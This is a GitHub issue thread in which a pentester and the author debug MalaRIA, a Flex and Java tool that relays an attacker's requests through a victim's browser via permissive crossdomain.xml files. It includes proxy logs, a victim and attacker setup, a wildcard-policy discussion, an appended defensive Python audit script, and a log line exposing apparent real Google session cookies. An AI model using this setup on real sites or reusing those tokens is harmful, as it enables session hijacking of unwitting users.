
doesn't work #3

Closed
am06 opened this Issue Nov 7, 2012 · 25 comments


am06 commented Nov 7, 2012

I've been trying it in a pentest. A quick fix would be nice :)

this is what i get when trying to browse:

java malaria.MalariaServer localhost 8081
Starting listener on port 8081 from hostname localhost
Starting http proxy on port 8080

Starting MalariaServer
Silverlight policy server starting in port 943 for serving policy for localhost and port 8081
Flex policy server starting in port 843 for serving policy for localhost and port 8081
Flex policy server>> Client connected

Flex policy server>> Policy established
0:0:0:0:0:0:0:1
Client connected
Read 5
<- Hello
Read 179
No match
Read 179
No match
Read 179
No match

am06 commented Nov 7, 2012

I think the problem is that the server can't read from the proxy. That's why you open a server for Flex on 843 and serve a crossdomain.xml, right?

Owner

eoftedal commented Nov 7, 2012

There seems to be something odd going on here. Not quite sure what's going on. Seems you are using IPv6. I've never tested it with that.
The Flex app successfully downloads the policy, but then seems to do something weird when connecting to start serving as a proxy.

Owner

eoftedal commented Nov 7, 2012

I would add a line below line 71 which prints the proxyMessage:
System.out.println(proxyMessage);

Which browser is using the proxy? My test setup recently was
Chrome - loads the malariproxy html and flex app
Firefox - Sets the java server as proxy and surfs through Chrome.

am06 commented Nov 7, 2012

I think I get the output Hello from that line; see below:

Flex policy server>> Client connected

Flex policy server>> Policy established
0:0:0:0:0:0:0:1
Client connected
Read 5
<- Hello
Read 1995
GET http://www.xxxxxxxx.com/music/zzzzzzzzz.png HTTP/1.1
Host: www.xxxxxxxx.com
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: __utma=257663189.330820119.1352295111.1352295111.1352295111.1; ____etc_all_other cookies

-> GET http://www.xxxxxxxx.com/music/yyyyyyyyy.png image/png,image/*;q=0.8,*/*;q=0.5
Waiting for response from client...
DL: 0
<- Read 4096:4094/0
<- Sending 4094 to proxy client
Error in communication
java.net.SocketException: Broken pipe
at java.net.SocketOutputStream.socketWrite0(Native Method)
at java.net.SocketOutputStream.socketWrite(SocketOutputStream.java:109)
at java.net.SocketOutputStream.write(SocketOutputStream.java:141)
at malaria.MalariaServer.serveSocket(MalariaServer.java:125)
at malaria.MalariaServer.<init>(MalariaServer.java:43)
at malaria.MalariaServer.main(MalariaServer.java:31)

This is the output I get from running: java malaria.MalariaServer localhost 8081

My setup is like this:

In Chrome I have loaded:
http://localhost/malaria/malariaflexproxy.html (where the victim lands; the victim is also connected to the attacked website in Chrome)

Above page gives output like:

MalaRIA Proxy

Connecting back to malaria server...
Connected and ready
Got data from proxy
Trying: [GET http://www.xxxxxxxxx.com/yyyyyyyyyyyy.png image/png,image/*;q=0.8,*/*;q=0.5 ]
Sent
Sending back data - length 0 (40851)

In Firefox I'm connected to the proxy on port 8080.

Owner

eoftedal commented Nov 7, 2012

Binary data is often a problem. Can you try requesting a single file in text format, like a css or js?

am06 commented Nov 7, 2012

I was requesting a website's page. OK, I'll try a single js.

am06 commented Nov 7, 2012

I tried to request a website's crossdomain.xml and I got this:

In the console:

No match Hello

Read 576
GET http://www.zzzzzzzzzz.com/crossdomain.xml HTTP/1.1
Host: www.zzzzzzzzzz.com
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive

-> GET http://www.zzzzzzzzzz.com/crossdomain.xml text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Waiting for response from client...

In Chrome as the victim:

MalaRIA Proxy

Connecting back to malaria server...
Connected and ready
Got data from proxy
Trying: [GET http://www.zzzzzzzzzz.com/crossdomain.xml text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 ]
Sent

So the Flash proxy says it sent the response to the Java app, right? And the Java app is waiting for it... perhaps the Java app could not read it?

am06 commented Nov 7, 2012

I also get this error from a background request of Firefox:

Read 1134
GET http://safebrowsing-cache.google.com/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGIuPDyCUjw8qBozHAwD_ATIFi8cDAAE HTTP/1.1
Host: safebrowsing-cache.google.com
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: PREF=ID=6556ffa782e53196:U=15224eceb63de5d6:LD=en:TM=1341076968:LM=1352274821:GM=1:IG=4:S=MzdqK743vQ4jt0dO; SID=DQAAANEAAABQBpsqe-4LwL0Rjlo3-4-D_Icl-uYCJm6Zub-RMzPOqsHlOovQmCbXbXEfqP6O1KNhOIEPy3SuiKUmU0ywkbENKL_jSh6dWwJ5Wm0MrPh8CkX-1lE_jCSUA4c2w7L6ofqmLdqudrr_5zEelnbnG5556TJ8Aqwy0ET-8d0X4IXrqd__V6h1q1WzqEgPNI8o_HE5yoXCgT6KSTbqO7aVtGy1pQ8mG2sEEhKuILo4rvUrDTGqK0HMV41Vb-8SKZ8UjpL-1PesK0mvB00rBcTydJfHykDK4ok3a2oH4CcFr__2cQ; NID=65=vkheXWqy-GJm-xU6wE6BAzP8Pcc0adSR-DjFsQxYhrDezEO5QvobIY3Vyktq3DEP5kJrFQkkfTYd7gjqyTFRJGTD0WWR37-yhOVpsdSikWadGEtAZzrwMqmkZCssTl_5xw7My2LALZNyk7GvMcAlNtGv_mBzEao; HSID=A6d713hE1OAiKMAPc; APISID=Rm9htsA2w9YdFfdQ/AsJKEzljRP7nGpDaq
Pragma: no-cache
Cache-Control: no-cache

-> GET http://safebrowsing-cache.google.com/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGIuPDyCUjw8qBozHAwD_ATIFi8cDAAE text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Waiting for response from client...
Error in communication
java.lang.StringIndexOutOfBoundsException: String index out of range: -1
at java.lang.String.checkBounds(String.java:405)
at java.lang.String.<init>(String.java:450)
at malaria.MalariaServer.serveSocket(MalariaServer.java:87)
at malaria.MalariaServer.<init>(MalariaServer.java:43)
at malaria.MalariaServer.main(MalariaServer.java:31)
0:0:0:0:0:0:0:1

Owner

eoftedal commented Nov 7, 2012

What happens if you restart the java server, wait until the flash app connects, and then make a single request to fetch a .css or .js?

am06 commented Nov 7, 2012

I think I've already tried that today at work, but without much success... I'll try again tomorrow...
Also I'll check /etc/hosts and see if I can leave localhost only as an IPv4 address like 127.0.0.1, so we can eliminate that aspect too...

Owner

eoftedal commented Nov 7, 2012

Ok, so I made a commit now with several changes to both the java backend and the flex frontend.
I suggest you recompile both and try again.

am06 commented Nov 7, 2012

Thanks, will test tomorrow morning when I get to work!

am06 commented Nov 8, 2012

Well, it seems to be proxying requests back and forth now, but...

  • I can browse to static js files, crossdomain.xml etc.
  • I can browse the whole page, but not authenticated... aren't cookies added automatically? Hmm...
  • And I don't see anything logged in the Java console or the swf hook page now...

Owner

eoftedal commented Nov 8, 2012

Are you actually using the proxy? Doesn't sound like it.

am06 commented Nov 8, 2012

Yes, I think there was also a problem with Firefox in that regard... sometimes using the proxy, sometimes not... but I've restarted, checked Firebug and it shows that it connects to 127.0.0.1:8080 where the Java proxy is (still nothing logged in the Flash page or Java backend)... my website is on SSL; does your proxy know how to proxy SSL? :)

am06 commented Nov 8, 2012

Yeah, that was a Burp problem in the middle... now requests are logged...

am06 commented Nov 8, 2012

A few errors from the swf hook page:

Trying: [GET http://www.zzzzz.com/style/banners-personal.css text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 ]
Sent
Sending back data - length 0 (4953)
Got data from proxy
Trying: [GET http://wwww.zzzz.com/js/tables.js?v=1.7.0&222 text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 ]
Sent
FAULT:Error #2048
Sending back 502
Got data from proxy
Trying: [GET http://wwww.zzzz.com/js/tables.js?v=1.7.0 text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 ]
Sent
FAULT:Error #2048
Sending back 502

It worked first for the css, then it gave some errors...

am06 commented Nov 8, 2012

And these are the errors from the Java backend:

-> GET http://www.zzzzz.com/css/personal.css text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Waiting for response from client...
DL: 4953
<- Read 4096:4091/4953
<- Read 862:4953/4953
<- Sending 4953 to proxy client
Incoming proxy request...
Read 1096
-> GET http://www.zzzzz.com/js//tables.js?v=1.7.0&222 text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Waiting for response from client...
Not accessible
Incoming proxy request...
Read 1092
-> GET http://www.zzzzz.com/js//tables.js?v=1.7.0 text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Waiting for response from client...
Not accessible
Incoming proxy request...

am06 commented Nov 8, 2012

I've begun looking through the source of the mxml file. When it receives a request from the Java app it should call the js log function with:
ExternalInterface.call("log", "Trying: [" + verb + " " + url + " " + accept + " " + (verb == "POST" ? " " + reqData : "") + "]");

but I do not see any output sometimes, so I don't think it forwards the request... why could that be?

Owner

eoftedal commented Nov 8, 2012

Might be something weird going on in the backend. Usually restarting the backend and reloading the Flex page works. The protocol is way too fragile. I've been thinking about rewriting it, but I think the guys working on BeEF will port it and make it available there.

Owner

eoftedal commented Nov 8, 2012

Btw, make sure you fully reload the swf after changing it (sometimes the browser will cache it, and you will not see the changes).

Owner

eoftedal commented Nov 8, 2012

Regarding

 FAULT:Error #2048
 Sending back 502

This usually happens if the flex app fails to load crossdomain.xml on the server in question, or the crossdomain.xml was loaded but was restricting the application from accessing the data.

am06 commented Nov 9, 2012

Hmm... regarding #2048, do you think a site with a file like this:

<cross-domain-policy>
  <allow-access-from domain="*"/>
  <allow-access-from domain="https://www.xxx.com"/>
  <allow-access-from domain="http://www.yyy.com"/>
</cross-domain-policy>

is secure or insecure? My confusion comes from the "*" which is at the start...

Also, do you have any idea if Java uses a file like crossdomain.xml?

Many thanks,

PS: I have started writing my own mxml file, much simpler, to test for that...

Owner

eoftedal commented Nov 9, 2012

I think that file is insecure. Need to test it.
Regarding Java, it does support crossdomain.xml, but as far as I know only if the .xml is completely open ("*")...
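As an added illustration, not code from the MalaRIA project or either participant: a small Python audit of a crossdomain.xml that applies the verdict above. The sample policy is constructed to mirror the one posted in the question; any `allow-access-from domain="*"` entry grants every origin, so the narrower entries after it change nothing.

```python
"""Audit a Flash/Flex crossdomain.xml for over-permissive grants (added example)."""
import xml.etree.ElementTree as ET

# Constructed sample, mirroring the policy discussed in this issue:
# a wildcard entry followed by two specific hosts.
SAMPLE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*"/>
  <allow-access-from domain="https://www.xxx.com"/>
  <allow-access-from domain="http://www.yyy.com"/>
</cross-domain-policy>
"""


def audit_policy(xml_text):
    """Return a list of findings; an empty list means no wildcard grants."""
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        raise ValueError("not a cross-domain-policy document")
    findings = []
    for entry in root.iter("allow-access-from"):
        domain = entry.get("domain", "")
        if domain == "*":
            # One wildcard makes every other entry irrelevant: any origin
            # can read responses with the victim's cookies attached.
            findings.append("wildcard domain grants all origins")
        elif domain.startswith("*."):
            findings.append("subdomain wildcard " + domain)
        # secure="false" additionally lets http origins read https content.
        if entry.get("secure", "true").lower() == "false":
            findings.append("secure=false on " + domain)
    return findings


def is_effectively_open(xml_text):
    """True when the policy contains a full wildcard grant."""
    return any(f.startswith("wildcard domain") for f in audit_policy(xml_text))


if __name__ == "__main__":
    for finding in audit_policy(SAMPLE_POLICY):
        print("FINDING:", finding)
    print("effectively open:", is_effectively_open(SAMPLE_POLICY))
```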

am06 commented Nov 9, 2012

You're right, it is. I've tested. However, I've tested on 2 sites, one over http and one over https.
The one with https didn't work; do you think it's because of SSL? Insecure crossdomain.xml doesn't work over SSL, know anything about that?

@am06 am06 closed this Nov 12, 2012
